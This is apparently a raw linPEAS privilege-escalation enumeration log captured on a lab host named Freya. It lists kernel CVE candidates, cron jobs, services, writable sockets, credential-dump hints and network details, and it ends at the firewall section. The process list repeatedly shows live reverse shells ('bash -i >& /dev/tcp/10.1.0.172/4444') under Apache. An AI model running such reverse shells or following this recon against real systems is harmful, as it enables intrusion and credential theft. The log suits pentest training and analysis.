pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 | Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} | Rank: 1 +CVE: CVE-2019-13272 | Name: PTRACE_TRACEME | Match data: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 | Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} | Rank: 1 | Details: Requires an active PolKit agent. +CVE: CVE-2021-27365 | Name: linux-iscsi | Match data: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y | Tags: RHEL=8 | Rank: 1 | Details: CONFIG_SLAB_FREELIST_HARDENED must not be enabled +CVE: CVE-2021-3493 | Name: Ubuntu OverlayFS | Match data: pkg=linux-kernel,ver>=3.13,ver<5.14,x86_64 | Tags: ubuntu=(14.04|16.04|18.04|20.04|20.10) | Rank: 1 | Details: Only Ubuntu is affected. +CVE: CVE-2021-22555 | Name: Netfilter heap out-of-bounds write | Match data: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 | Tags: ubuntu=20.04{kernel:5.8.0-*} | Rank: 1 | Details: ip_tables kernel module must be loaded +═╣ Kernel vulns found: 6 + + + + ╔═══════════╗ +═══════════════════════════════════╣ Container ╠═══════════════════════════════════ + ╚═══════════╝ +╔══════════╣ Container related tools present (if any): (T1613) +/usr/bin/nsenter +/usr/bin/unshare +/usr/sbin/chroot + +╔══════════╣ Container details (T1613,T1611) +═╣ Is this a container? ........... No +═╣ Interesting runtime sockets ... ═╣ Any running containers? ........ No + + + + ╔═══════╗ +═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ + ╚═══════╝ +Learn and practice cloud hacking techniques in https://training.hacktricks.xyz + +═╣ GCP Virtual Machine? ................. No +═╣ GCP Cloud Funtion? ................... No +═╣ AWS ECS? ............................. No +═╣ AWS EC2? ............................. No +═╣ AWS EC2 Beanstalk? ................... No +═╣ AWS Lambda? .......................... No +═╣ AWS Codebuild? ....................... No +═╣ DO Droplet? .......................... No +═╣ IBM Cloud VM? ........................ No +═╣ Azure VM or Az metadata? ............. No +═╣ Azure APP or IDENTITY_ENDPOINT? ...... No +═╣ Azure Automation Account? ............ No +═╣ Aliyun ECS? .......................... No +═╣ Tencent CVM? ......................... No + + + + ╔════════════════════════════════════════════════╗ +════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ + ╚════════════════════════════════════════════════╝ +╔══════════╣ Running processes (cleaned) (T1057) +╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes +root 1 0.0 0.6 138908 6700 ? Ss 13:29 0:01 /sbin/init +root 427 0.0 0.5 56852 5324 ? Ss 13:29 0:01 /lib/systemd/systemd-journald +root 461 0.0 0.3 45932 4028 ? Ss 13:29 0:00 /lib/systemd/systemd-udevd +systemd+ 474 0.0 0.3 127288 4060 ? Ssl 13:29 0:00 /lib/systemd/systemd-timesyncd +root 625 0.0 0.2 29664 2900 ? Ss 13:29 0:00 /usr/sbin/cron -f +root 2619 0.0 0.2 48824 2760 ? S 15:29 0:00 _ /usr/sbin/CRON -f +root 2632 0.0 0.2 48824 2760 ? S 15:30 0:00 _ /usr/sbin/CRON -f +root 2637 0.0 0.5 62292 6064 ? S 15:30 0:00 | _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +root 2642 0.0 0.2 48824 2760 ? S 15:31 0:00 _ /usr/sbin/CRON -f +root 2647 0.0 0.6 62296 6236 ? S 15:31 0:00 | _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +root 18230 0.0 0.2 48824 2760 ? S 15:32 0:00 _ /usr/sbin/CRON -f +root 18235 0.0 0.6 62296 6416 ? S 15:32 0:00 _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +message+ 630 0.0 0.3 45128 3784 ? Ss 13:29 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation +root 652 0.0 0.3 250112 3092 ? Ssl 13:29 0:00 /usr/sbin/rsyslogd -n +root 654 0.0 0.4 46476 4548 ? Ss 13:29 0:00 /lib/systemd/systemd-logind +root 659 0.0 0.2 28456 2904 ? Ss 13:29 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf +root 674 0.0 0.1 14524 1660 tty1 Ss+ 13:29 0:00 /sbin/agetty --noclear tty1 linux +root 689 0.0 0.1 20360 1040 ? Ss 13:29 0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens18.pid -lf /var/lib/dhcp/dhclient.ens18.leases -I -df /var/lib/dhcp/dhclient6.ens18.leases ens18 +root 736 0.0 0.5 69960 6020 ? Ss 13:29 0:00 /usr/sbin/sshd -D +root 740 0.0 0.5 69960 5220 ? Ss 13:29 0:00 /usr/sbin/sshd -D -f /etc/ssh/mgmtsshd_config +mysql 883 0.1 7.9 670640 81132 ? Ssl 13:29 0:07 /usr/sbin/mysqld +root 952 0.1 0.2 22516 2640 ? Ss 13:29 0:07 /usr/sbin/qemu-ga --daemon[0mize -m virtio-serial -p /dev/virtio-ports/org.qemu.guest_agent.0 +root 1022 0.0 2.6 302668 26864 ? Ss 13:29 0:00 /usr/sbin/apache2 -k start +www-data 1053 0.0 2.4 303320 25148 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1054 0.0 2.3 305352 23872 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 2363 0.0 0.0 4276 696 ? S 15:08 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2364 0.0 0.2 17940 2764 ? S 15:08 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2365 0.0 0.3 18164 3172 ? S 15:08 0:00 | _ bash -i +www-data 2486 0.0 0.1 16184 1168 ? S 15:14 0:00 | _ ping 8.8.8.8 +www-data 1055 0.0 2.5 303324 25916 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1056 0.0 3.1 307528 31972 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1057 0.0 3.1 305992 31716 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 2626 0.0 0.0 4276 736 ? S 15:29 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2627 0.0 0.2 17940 2728 ? S 15:29 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2628 0.0 0.3 18164 3172 ? S 15:29 0:00 | _ bash -i +www-data 2649 5.4 0.5 21000 5792 ? S 15:31 0:02 | _ bash linpeas.sh +www-data 18313 0.0 0.4 21000 4616 ? S 15:32 0:00 | | _ bash linpeas.sh +www-data 18317 0.0 0.2 36772 2944 ? R 15:32 0:00 | | | _ ps fauxwww +www-data 18316 0.0 0.3 21000 3216 ? S 15:32 0:00 | | _ bash linpeas.sh +www-data 2650 0.0 0.0 4188 704 ? S 15:31 0:00 | _ tee out.txt +www-data 1955 0.0 0.9 302756 9564 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1958 0.0 3.4 307812 34700 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1959 0.0 3.3 306112 33732 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1960 0.0 3.0 307428 30936 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 2494 0.0 0.0 4276 744 ? S 15:15 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2495 0.0 0.2 17940 2760 ? S 15:15 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2496 0.0 0.3 18164 3172 ? S 15:15 0:00 | _ bash -i +www-data 2506 0.0 0.1 16184 1120 ? S 15:16 0:00 | _ ping 8.8.8.8 +www-data 1961 0.0 3.4 308160 34732 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +root 1250 0.0 0.5 81876 5204 ? Ss 13:33 0:00 sendmail: MTA: accepting connections + +╔══════════╣ Processes with unusual configurations (T1057) + +╔══════════╣ Processes with credentials in memory (root req) (T1003.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory +gdm-password Not Found +gnome-keyring-daemon Not Found +lightdm Not Found +vsftpd process found (dump creds from memory as root) +apache2 process found (dump creds from memory as root) +sshd: Not Found +mysql process found (dump creds from memory as root) +postgres Not Found +redis-server Not Found +mongod Not Found +memcached Not Found +elasticsearch Not Found +jenkins Not Found +tomcat Not Found +nginx Not Found +php-fpm Not Found +supervisord Not Found +vncserver Not Found +xrdp Not Found +teamviewer Not Found + +╔══════════╣ Opened Files by processes (T1003.007) +Process 2363 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[25265] + └─ /var/log/apache2/error.log +Process 2364 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[25265] + └─ /var/log/apache2/error.log +Process 2494 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[26160] + └─ /var/log/apache2/error.log +Process 2495 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[26160] + └─ /var/log/apache2/error.log +Process 2626 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[27471] + └─ /var/log/apache2/error.log +Process 2627 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[27471] + └─ /var/log/apache2/error.log +Process 2650 (www-data) - tee out.txt + └─ Has open files: + └─ pipe:[27658] + └─ /tmp/out.txt + +╔══════════╣ Processes with memory-mapped credential files (T1003.007) + +╔══════════╣ Processes whose PPID belongs to a different user (not root) (T1134.004) +╚ You will know if a user can somehow spawn processes as a different user + +╔══════════╣ Files opened by processes belonging to other users (T1083) +╚ This is usually empty because of the lack of privileges to read other user processes information + +╔══════════╣ Check for vulnerable cron jobs (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs +══╣ Cron jobs list (T1053.003) +/usr/bin/crontab +incrontab Not Found +-rw-r--r-- 1 root root     722 May  6 11:17 /etc/crontab + +/etc/cron.d: +total 20 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rw-r--r--  1 root root  712 May  6 11:17 php +-rw-r--r--  1 root root 2467 May  6 11:17 sendmail + +/etc/cron.daily: +total 44 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rwxr-xr-x  1 root root  539 May  6 11:17 apache2 +-rwxr-xr-x  1 root root 1474 May  6 11:17 apt-compat +-rwxr-xr-x  1 root root  355 May  6 11:17 bsdmainutils +-rwxr-xr-x  1 root root 1597 May  6 11:17 dpkg +-rwxr-xr-x  1 root root   89 May  6 11:17 logrotate +-rwxr-xr-x  1 root root 1065 May  6 11:17 man-db +-rwxr-xr-x  1 root root  249 May  6 11:17 passwd +-rwxr-xr-x  1 root root 3302 May  6 11:17 sendmail + +/etc/cron.hourly: +total 12 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder + +/etc/cron.monthly: +total 12 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder + +/etc/cron.weekly: +total 16 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rwxr-xr-x  1 root root  723 May  6 11:17 man-db + +SHELL=/bin/sh +PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin + +17 * * * * root cd / && run-parts --report /etc/cron.hourly +25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) +47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) +52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) +/etc/crontab:8:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin +/etc/crontab:11:17 * * * * root cd / && run-parts --report /etc/cron.hourly +/etc/crontab:12:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) +/etc/crontab:13:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) +/etc/crontab:14:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) + +══╣ Cron files with hidden carriage returns (T1053.003) + +══╣ Checking for specific cron jobs vulnerabilities (T1053.003) +Checking cron directories... +══╣ run-parts executable entries (T1053.003) +[/etc/cron.hourly] +[/etc/cron.daily] +/etc/cron.daily/apache2 +/etc/cron.daily/apt-compat +/etc/cron.daily/bsdmainutils +/etc/cron.daily/dpkg +/etc/cron.daily/logrotate +/etc/cron.daily/man-db +/etc/cron.daily/passwd +/etc/cron.daily/sendmail +[/etc/cron.weekly] +/etc/cron.weekly/man-db +[/etc/cron.monthly] + + +╔══════════╣ System timers (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers +══╣ Active timers: (T1053.003) +NEXT LEFT LAST PASSED UNIT ACTIVATES +Fri 2026-05-08 15:39:00 CEST 6min left Fri 2026-05-08 15:09:01 CEST 23min ago phpsessionclean.timer phpsessionclean.service +Fri 2026-05-08 22:01:04 CEST 6h left Fri 2026-05-08 13:29:47 CEST 2h 2min ago apt-daily.timer apt-daily.service +Sat 2026-05-09 06:19:36 CEST 14h left Fri 2026-05-08 13:29:47 CEST 2h 2min ago apt-daily-upgrade.timer apt-daily-upgrade.service +Sat 2026-05-09 13:44:22 CEST 22h left Fri 2026-05-08 13:44:22 CEST 1h 47min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service +══╣ Disabled timers: (T1053.003) +══╣ Additional timer files: (T1053.003) + +╔══════════╣ Services and Service Files (T1543.002,T1007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services + +══╣ Active services: (T1543.002,T1007) +apache2.service loaded active running The Apache HTTP Server +console-setup.service loaded active exited Set console font and keymap +cron.service loaded active running Regular background program processing daemon +dbus.service loaded active running D-Bus System Message Bus +getty@tty1.service loaded active running Getty on tty1 +herosshd.service loaded active running OpenBSD Secure Shell server +ifup@ens18.service loaded active exited ifup for ens18 + Potential issue in service file: /lib/systemd/system/ifup@.service + └─ RELATIVE_PATH: Could be executing some relative path\n +keyboard-setup.service loaded active exited Set the console keyboard layout +kmod-static-nodes.service loaded active exited Create list of required static device nodes for the current kernel +mariadb.service loaded active running MariaDB 10.1.45 database server + Potential issue in service file: /lib/systemd/system/mariadb.service + └─ RELATIVE_PATH: Could be executing some relative path\n +mgmtsshd.service loaded active running HeroLab Management OpenBSD Secure Shell server +networking.service loaded active exited Raise network interfaces + Potential issue in service file: /lib/systemd/system/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n +qemu-guest-agent.service loaded active running LSB: QEMU Guest Agent startup script +rsyslog.service loaded active running System Logging Service +sendmail.service loaded active running LSB: powerful, efficient, and scalable Mail Transport Agent +systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage +systemd-journald.service loaded active running Journal Service +systemd-logind.service loaded active running Login Service +systemd-modules-load.service loaded active exited Load Kernel Modules +systemd-random-seed.service loaded active exited Load/Save Random Seed +systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems + Potential issue in service: systemd-remount-fs.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-sysctl.service loaded active exited Apply Kernel Variables +systemd-timesyncd.service loaded active running Network Time Synchronization +systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev +systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories +systemd-udev-trigger.service loaded active exited udev Coldplug all Devices + Potential issue in service: systemd-udev-trigger.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-udevd.service loaded active running udev Kernel Device Manager +systemd-update-utmp.service loaded active exited Update UTMP about System Boot/Shutdown +systemd-user-sessions.service loaded active exited Permit User Sessions +vsftpd.service loaded active running vsftpd FTP server +LOAD = Reflects whether the unit definition was properly loaded. +ACTIVE = The high-level unit activation state, i.e. generalization of SUB. +SUB = The low-level unit activation state, values depend on unit type. +30 loaded units listed. Pass --all to see loaded but inactive units, too. +To show all installed unit files use 'systemctl list-unit-files'. + +══╣ Disabled services: (T1543.002,T1007) +apache-htcacheclean.service disabled +apache-htcacheclean@.service disabled +apache2@.service disabled +console-getty.service disabled +dbus-org.freedesktop.network1.service disabled +dbus-org.freedesktop.resolve1.service disabled +debug-shell.service disabled +mariadb@.service disabled +serial-getty@.service disabled +sudo.service disabled + Potential issue in service: sudo.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-networkd-wait-online.service disabled +systemd-networkd.service disabled +systemd-resolved.service disabled +13 unit files listed. + +══╣ Additional service files: (T1543.002,T1007) + Potential issue in service file: /etc/systemd/system/multi-user.target.wants/mariadb.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/multi-user.target.wants/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/mysql.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/mysqld.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/network-online.target.wants/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /lib/systemd/system/emergency.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /lib/systemd/system/ifup@.service + └─ RELATIVE_PATH: Could be executing some relative path\n +You can't write on systemd PATH + +╔══════════╣ Systemd Information (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths +═╣ Systemd version and vulnerabilities? .............. ═╣ Services running as root? .....  +═╣ Running services with dangerous capabilities? ...  +═╣ Services with writable paths? . mariadb.service: Uses relative path 'sync' (from # ExecStartPre=sync) +mariadb.service: Uses relative path 'sysctl' (from # ExecStartPre=sysctl -q -w vm.drop_caches=3) +mariadb.service: Uses relative path 'numactl' (from # Change ExecStart=numactl --interleave=all /usr/sbin/mysqld......) + +╔══════════╣ Systemd PATH (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +╔══════════╣ Analyzing .socket files (T1559) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets + +╔══════════╣ Unix Sockets Analysis (T1571,T1049) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets +/run/dbus/system_bus_socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/mysqld/mysqld.sock + └─(Read Write Execute (Weak Permissions: 777) ) +/run/sendmail/mta/smcontrol +/run/systemd/cgroups-agent +/run/systemd/fsck.progress +/run/systemd/journal/dev-log + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/stdout + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/syslog + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/notify + └─(Read Write Execute (Weak Permissions: 777) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/private + └─(Read Write Execute (Weak Permissions: 777) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/udev/control +/var/run/dbus/system_bus_socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/var/run/mysqld/mysqld.sock + └─(Read Write Execute (Weak Permissions: 777) ) +/var/run/sendmail/mta/smcontrol + +╔══════════╣ D-Bus Analysis (T1559.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus +NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION +:1.0 1 systemd root :1.0 init.scope - - +:1.1 654 systemd-logind root :1.1 systemd-logind.service - - +:1.339 32596 busctl www-data :1.339 apache2.service - - +org.freedesktop.DBus 630 dbus-daemon[0m messagebus org.freedesktop.DBus dbus.service - - +org.freedesktop.hostname1 - - - (activatable) - - +org.freedesktop.locale1 - - - (activatable) - - +org.freedesktop.login1 654 systemd-logind root :1.1 systemd-logind.service - - +org.freedesktop.network1 - - - (activatable) - - +org.freedesktop.resolve1 - - - (activatable) - - +org.freedesktop.systemd1 1 systemd root :1.0 init.scope - - +org.freedesktop.timedate1 - - - (activatable) - - + +╔══════════╣ D-Bus Configuration Files (T1559.001) +Analyzing /etc/dbus-1/system.d/org.freedesktop.hostname1.conf: + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.locale1.conf: + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.login1.conf: + └─(Allow rules in default context) + └─ + └─(Allow rules in default context) + └─ + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.systemd1.conf: + └─(Allow rules in default context) + └─ + +Activation definitions in /usr/share/dbus-1/services: +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:9:Name=org.freedesktop.systemd1 +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:11:User=User=root +Activation definitions in /usr/share/dbus-1/system-services: +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:9:Name=org.freedesktop.locale1 +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:10:Exec=Exec=/lib/systemd/systemd-localed +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:9:Name=org.freedesktop.hostname1 +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:10:Exec=Exec=/lib/systemd/systemd-hostnamed +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:9:Name=org.freedesktop.login1 +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:10:Exec=Exec=/bin/sh -c 'mkdir -p /run/systemd; exec /lib/systemd/systemd-logind' +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:9:Name=org.freedesktop.timedate1 +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:10:Exec=Exec=/lib/systemd/systemd-timedated +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:9:Name=org.freedesktop.resolve1 +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:9:Name=org.freedesktop.network1 +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:9:Name=org.freedesktop.systemd1 +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:11:User=User=root + +══╣ D-Bus Session Bus Analysis (T1559.001) +(Access to session bus available) + + +╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust (T1021.004) + +══╣ Listening r-services (TCP 512-514) (T1021.004) + +══╣ systemd units exposing r-services (T1021.004) +rlogin|rsh|rexec units Not Found + +══╣ inetd/xinetd configuration for r-services (T1021.004) +/etc/inetd.conf Not Found +/etc/xinetd.d Not Found + +══╣ Installed r-service server packages (T1021.004) + No related packages found via dpkg + +══╣ /etc/hosts.equiv and /etc/shosts.equiv (T1021.004) + +══╣ Per-user .rhosts files (T1021.004) +.rhosts Not Found + +══╣ PAM rhosts authentication (T1021.004) +/etc/pam.d/rlogin|rsh Not Found + +══╣ SSH HostbasedAuthentication (T1021.004) + HostbasedAuthentication no or not set + +══╣ Potential DNS control indicators (local) (T1021.004) + Not detected + +╔══════════╣ Crontab UI (root) misconfiguration checks (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs +crontab-ui Not Found +╔══════════╣ Deleted files still open (T1083) +╚ Open deleted files can hide tools and still consume disk space + +╔══════════╣ Deleted executables still running (T1083) +╚ A deleted /proc//exe may indicate tampering, cleanup, or a useful runtime-only binary + + + + ╔═════════════════════╗ +══════════════════════════════╣ Network Information ╠══════════════════════════════ + ╚═════════════════════╝ +╔══════════╣ Interfaces (T1016) +default 0.0.0.0 +loopback 127.0.0.0 +link-local 169.254.0.0 + +1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 + link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 + inet 127.0.0.1/8 scope host lo + valid_lft forever preferred_lft forever + inet6 ::1/128 scope host + valid_lft forever preferred_lft forever +2: ens18: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + link/ether bc:24:11:59:66:de brd ff:ff:ff:ff:ff:ff + inet 10.2.66.5/24 brd 10.2.66.255 scope global ens18 + valid_lft forever preferred_lft forever + inet6 fe80::be24:11ff:fe59:66de/64 scope link + valid_lft forever preferred_lft forever +══╣ Routing & policy quick view (T1016) +default via 10.2.66.1 dev ens18 +10.2.66.0/24 dev ens18 proto kernel scope link src 10.2.66.5 +fe80::/64 dev ens18 proto kernel metric 256 pref medium + +0: from all lookup local +32766: from all lookup main +32767: from all lookup default +══╣ Virtual/overlay interfaces quick view (T1016) +1: lo: mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1 +2: ens18: mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000 +══╣ Network namespaces quick view (T1016) +══╣ Forwarding status (T1016) +net.ipv4.ip_forward = 0 +net.ipv6.conf.all.forwarding = 0 + +╔══════════╣ Hostname, hosts and DNS (T1016,T1018) +══╣ Hostname Information (T1016,T1018) +System hostname: Freya +FQDN: Freya + +══╣ Hosts File Information (T1016,T1018) +Contents of /etc/hosts: + 127.0.0.1 localhost + 127.0.1.1 Freya + ::1 localhost ip6-localhost ip6-loopback + ff02::1 ip6-allnodes + ff02::2 ip6-allrouters + +══╣ DNS Configuration (T1016,T1018) +DNS Servers (resolv.conf): + 10.2.5.1 + +Systemd-resolved configuration: + [Resolve] + +DNS Domain Information: +(none) + +DNS Cache Status (systemd-resolve): + DNS Servers: 10.2.5.1 + DNSSEC NTA: 10.in-addr.arpa + 16.172.in-addr.arpa + 168.192.in-addr.arpa + 17.172.in-addr.arpa + 18.172.in-addr.arpa + +╔══════════╣ Active Ports (T1049) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports +══╣ Active Ports (ss) (T1049) +tcp LISTEN 0 80 127.0.0.1:3306 *:* +tcp LISTEN 0 128 *:5355 *:* +tcp LISTEN 0 10 127.0.0.1:587 *:* +tcp LISTEN 0 128 *:22 *:* +tcp LISTEN 0 10 127.0.0.1:25 *:* +tcp LISTEN 0 128 *:65535 *:* +tcp LISTEN 0 128 :::5355 :::* +tcp LISTEN 0 128 :::80 :::* +tcp LISTEN 0 32 :::21 :::* +tcp LISTEN 0 128 :::22 :::* +tcp LISTEN 0 128 :::65535 :::* +══╣ Local-only listeners (loopback) (T1049) +tcp LISTEN 0 80 127.0.0.1:3306 *:* +tcp LISTEN 0 10 127.0.0.1:587 *:* +tcp LISTEN 0 10 127.0.0.1:25 *:* +══╣ Unique listener bind addresses (T1049) +* +127.0.0.1 +127.0.0.53%lo +:: +══╣ Potential local forwarders/relays (T1049) +www-data 647 0.0 0.1 13208 1076 ? S 15:32 0:00 sed -E s,socat|ssh|-L|-R|-D|ncat|nc,.[1;31;103m&.[0m,g + +╔══════════╣ Network Traffic Analysis Capabilities (T1040) + +══╣ Available Sniffing Tools (T1040) +No sniffing tools found + +══╣ Network Interfaces Sniffing Capabilities (T1040) +Interface lo (loopback): Not sniffable +Interface ens18: Not sniffable +No sniffable interfaces found + +══╣ Running sniffing/traffic reconstruction processes (T1040) + +╔══════════╣ Firewall Rules 